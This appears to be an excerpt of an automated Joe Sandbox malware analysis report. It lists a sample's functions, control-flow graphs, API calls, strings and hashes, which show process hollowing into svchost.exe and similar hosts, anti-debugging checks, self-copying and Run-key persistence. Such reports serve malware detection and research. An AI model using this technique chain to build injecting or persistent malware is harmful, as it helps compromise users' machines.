7ff785312afa 278->281 282 7ff785312afc-7ff785312b25 278->282 279->234 284 7ff785312dea-7ff785312df7 VirtualFree 280->284 285 7ff785312dd5-7ff785312de8 VirtualFree 280->285 281->275 286 7ff785312b30-7ff785312b3e 282->286 284->234 285->234 287 7ff785312d23 286->287 288 7ff785312b44-7ff785312bcf 286->288 287->277 289 7ff785312be1-7ff785312bef 288->289 290 7ff785312d1e 289->290 291 7ff785312bf5-7ff785312c28 289->291 290->286 292 7ff785312c2a 291->292 293 7ff785312c2c-7ff785312cff ReadProcessMemory WriteProcessMemory 291->293 292->289 294 7ff785312d19 293->294 295 7ff785312d01-7ff785312d14 VirtualFree 293->295 294->290 295->234
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                        • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                        • API String ID: 514040917-3001742581
                                                                                                                                                                                                                        • Opcode ID: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction ID: c80728463123badeb1e74f997b3b33246598fec62b48e6ea1964ab04c0cff317
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a84cd30e02b54a1d7e6c2a6b1c87ff30d9e49ed3be8c7b01658cf5b106b86537
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3932EB32658BC186DB70DB26E8547AAB3A1FB88B94F504139EA8D83F58DF7CD444CB14
                                                                                                                                                                                                                        Function 00007FF785313418 Relevance: 43.9, APIs: 18, Strings: 7, Instructions: 145COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 297 7ff785313418-7ff78531342e call 7ff78531153c call 7ff7853131b8 302 7ff785313438-7ff785313466 call 7ff7853140b0 call 7ff785313cb0 call 7ff785313ee0 297->302 303 7ff785313430-7ff785313432 ExitProcess 297->303 310 7ff7853134b7-7ff7853134ca call 7ff785313ee0 302->310 311 7ff785313468-7ff785313479 call 7ff7853141f0 302->311 316 7ff785313508-7ff78531351b call 7ff785313ee0 310->316 317 7ff7853134cc-7ff7853134dd call 7ff7853141f0 310->317 318 7ff78531347b-7ff78531348c call 7ff7853141f0 311->318 319 7ff78531348e-7ff785313490 ExitProcess 311->319 326 7ff78531351d-7ff78531352e call 7ff7853141f0 316->326 327 7ff78531355e-7ff785313574 call 7ff785313a40 call 7ff7853133a8 316->327 328 7ff7853134e7 call 7ff785313218 317->328 329 7ff7853134df-7ff7853134e1 ExitProcess 317->329 318->319 330 7ff785313496 call 7ff7853132a8 318->330 341 7ff785313538 call 7ff785313218 326->341 342 7ff785313530-7ff785313532 ExitProcess 326->342 348 7ff7853135ca-7ff7853136a2 CreateThread * 3 WaitForMultipleObjects ExitProcess 327->348 349 7ff785313576-7ff785313587 call 7ff7853141f0 327->349 337 7ff7853134ec-7ff7853134f1 328->337 335 7ff78531349b-7ff7853134a0 330->335 339 7ff7853134af-7ff7853134b1 ExitProcess 335->339 340 7ff7853134a2-7ff7853134ad Sleep 335->340 343 7ff785313500-7ff785313502 ExitProcess 337->343 344 7ff7853134f3-7ff7853134fe Sleep 337->344 340->335 350 7ff78531353d-7ff785313542 341->350 344->337 355 7ff785313589-7ff78531359a call 7ff7853141f0 349->355 356 7ff78531359c-7ff78531359e ExitProcess 349->356 352 7ff785313551-7ff785313553 ExitProcess 350->352 353 7ff785313544-7ff78531354f Sleep 350->353 353->350 355->356 359 7ff7853135a4 call 7ff7853132a8 355->359 361 7ff7853135a9-7ff7853135ae 359->361 362 7ff7853135bd-7ff7853135bf ExitProcess 361->362 363 7ff7853135b0-7ff7853135bb Sleep 361->363 363->361
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: ExitProcess$DebuggerPresent
                                                                                                                                                                                                                        • String ID: audiodg.exe$msiexec.exe$svchost.exe$worker_BAccdq$worker_FDhvwc$worker_RdDwvE$worker_kBEqZh
                                                                                                                                                                                                                        • API String ID: 613740775-1953711635
                                                                                                                                                                                                                        • Opcode ID: 0adf9e880a9d06d74ad0b688ea6cf154d33ace48af0fb221e22e7458701538ae
                                                                                                                                                                                                                        • Instruction ID: 01aa8a4bae5ecbc1c4d734faea25bf362bf877af89abdcf62a28f5116789cc02
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0adf9e880a9d06d74ad0b688ea6cf154d33ace48af0fb221e22e7458701538ae
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FA614B219A874291FA64BB30E81527AE6A0BF44F69FE0013DF44E86DD1DF3DE509C234
                                                                                                                                                                                                                        Function 00007FF7853140B0 Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Token$InformationProcess$CloseCurrentHandleOpen
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 434396405-0
                                                                                                                                                                                                                        • Opcode ID: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction ID: eba7e87628c60ab288ea9dcc489a0bfbbcae69af1ef490e56446c92911f7d071
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5883799f07d152a8d2a009714e5b601515180045f018943f2e62cfac24bd2fab
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B0310736628A4186D650EB25E85062AF760FBD4BA8FA05039FA8E47F68DF7CD441CB10
                                                                                                                                                                                                                        Function 00007FF7853131B8 Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 3920101602-0
                                                                                                                                                                                                                        • Opcode ID: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction ID: bf51fc383bd70ce8a67d6ed09a1c93dfc166687e366f7aed8935a6b180795e9b
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2760cc306fb648241171a8ad32ec7adba68cc7e55a00feed93d80baffd57ff2b
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 57F05E2595C28281F7307B74940837AEBA0BB45F1CFA40178F59D0A994CF2CD50ACB35
                                                                                                                                                                                                                        Function 00007FF7853114EC Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 422 7ff7853114ec-7ff785311528 LoadLibraryA GetProcAddress
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 2574300362-0
                                                                                                                                                                                                                        • Opcode ID: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction ID: e6bd94ebc5039cb3a416c6c0305aad7b7928813be6549a4648e0bf37b1285884
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3de293353023ce7eaf1012c377f6a933be5880676eb30226596abc0cfb8adc53
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 73E00276518F85D6C620EB25F84411AB7B4FBC9B98FA05125EACD42B28DF3CC669CB04
                                                                                                                                                                                                                        Function 00007FF785313890 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 43stringCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF785313750
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313710: GetVolumeInformationW.KERNELBASE ref: 00007FF7853137CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313710: wsprintfW.USER32 ref: 00007FF78531386E
                                                                                                                                                                                                                        • SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF7853138D9
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF7853138EE
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313901
                                                                                                                                                                                                                        • CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313911
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313924
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313939
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF78531394C
                                                                                                                                                                                                                        • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313961
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: lstrcat$Directory$AttributesCreateFileFolderInformationPathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: .exe
                                                                                                                                                                                                                        • API String ID: 1846285901-4119554291
                                                                                                                                                                                                                        • Opcode ID: e724a501fcc4b427934853a5f1cdcc4efb9286cbaa29a2711b7771ae621e4adc
                                                                                                                                                                                                                        • Instruction ID: e059bd1b7f96284413592e419547631680be7ae0c568bebc378ec3ee208dd3d7
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e724a501fcc4b427934853a5f1cdcc4efb9286cbaa29a2711b7771ae621e4adc
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B4117F25638A8285DB60AB74F86036AF361FBC4B98F905435FA4E43E28DF3CD008C754
                                                                                                                                                                                                                        Function 00007FF785313A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313710: GetWindowsDirectoryW.KERNEL32 ref: 00007FF785313750
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313710: GetVolumeInformationW.KERNELBASE ref: 00007FF7853137CD
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313710: wsprintfW.USER32 ref: 00007FF78531386E
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF7853138D9
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF7853138EE
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313901
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313911
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313924
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313939
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF78531394C
                                                                                                                                                                                                                          • Part of subcall function 00007FF785313890: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF785313A75), ref: 00007FF785313961
                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32 ref: 00007FF785313A85
                                                                                                                                                                                                                        • DeleteFileW.KERNELBASE ref: 00007FF785313A90
                                                                                                                                                                                                                        • CopyFileW.KERNELBASE ref: 00007FF785313AA9
                                                                                                                                                                                                                        • SetFileAttributesW.KERNELBASE ref: 00007FF785313AC1
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: Services
                                                                                                                                                                                                                        • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                        • Opcode ID: 25d841feda69c35f6f830d563653fc50c0c263b8f553c30975fd0269f8fa3881
                                                                                                                                                                                                                        • Instruction ID: 471250e696848921b0b10cd3f955c403f064f65e353039e7e1d14a63583648d5
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 25d841feda69c35f6f830d563653fc50c0c263b8f553c30975fd0269f8fa3881
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D8019B61B2854653EB50EB34E8543AAD350FB94B58FE05439E24D83DA4EE3CD20ACB54
                                                                                                                                                                                                                        Function 00007FF785313710 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: DirectoryInformationVolumeWindowswsprintf
                                                                                                                                                                                                                        • String ID: %08lX%04lX%lu
                                                                                                                                                                                                                        • API String ID: 3001812590-640692576
                                                                                                                                                                                                                        • Opcode ID: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction ID: 43687dfef67490940af733c7ee6f291118bb84212028b36cec42defd4785459c
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ba7099422deb3340150bc710d1235fe6d0c1360a6f14ed1e57a7d3e671112d6e
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7531D72662C6C1C6D720EF64E4983ABF3A0FB84B54F90113AE68D87E58DB7DC509CB14
                                                                                                                                                                                                                        Function 00007FF785313980 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43registryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: CloseOpenValue
                                                                                                                                                                                                                        • String ID: Software\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                                        • API String ID: 779948276-1428018034
                                                                                                                                                                                                                        • Opcode ID: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction ID: afaa6d5b81b5b5e72d1fcd3e79fda25bf7850c37d539114e30da1e2cdc064406
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 63c1ccfa42da33961596c073b4ba4259c04753ac5328876c0619d7e38573e54f
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD111F3662CB8086D7909B25F44466AB7A0FB89BB4F505235F9AE43FA8DF7CD144CB10
                                                                                                                                                                                                                        Function 00007FF785313B20 Relevance: 1.3, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 426 7ff785313b20-7ff785313b46 VirtualAlloc
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                                                                                                        • Opcode ID: 99f7d4ad0234b598d10cda1f958cd0c548c533684dba80b324c491c4e2f5f85d
                                                                                                                                                                                                                        • Instruction ID: 16d7cfdfbaeb39ffdaccc47a3edfa4dcca0fb8dcb2012dc02b69caab7a290c3e
                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99f7d4ad0234b598d10cda1f958cd0c548c533684dba80b324c491c4e2f5f85d
                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 34C012B1F2514087D71C9F31E451A0A6A20B744744FA04028E64157B44C93DC1518F04
                                                                                                                                                                                                                        Function 00007FF785313AF0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                        control_flow_graph 423 7ff785313af0-7ff785313aff 424 7ff785313b01-7ff785313b0e VirtualFree 423->424 425 7ff785313b14-7ff785313b18 423->425 424->425
                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                        • Source File: 00000000.00000002.1529284109.00007FF785311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF785310000, based on PE: true
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529235194.00007FF785310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529334145.00007FF785315000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529362965.00007FF785318000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529395046.00007FF785319000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        • Associated: 00000000.00000002.1529433584.00007FF78531B000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_7ff785310000_3Qv3xyyL5G.jbxd
                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                        • API ID: FreeVirtual
                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                        • API String ID: 1263568516-0
                                                                                                                                                                                                                        • Opcode ID: 02a68683b8a88d890b7632b1029efc6fd5a6036bd7126e420ffe44a182f27b57
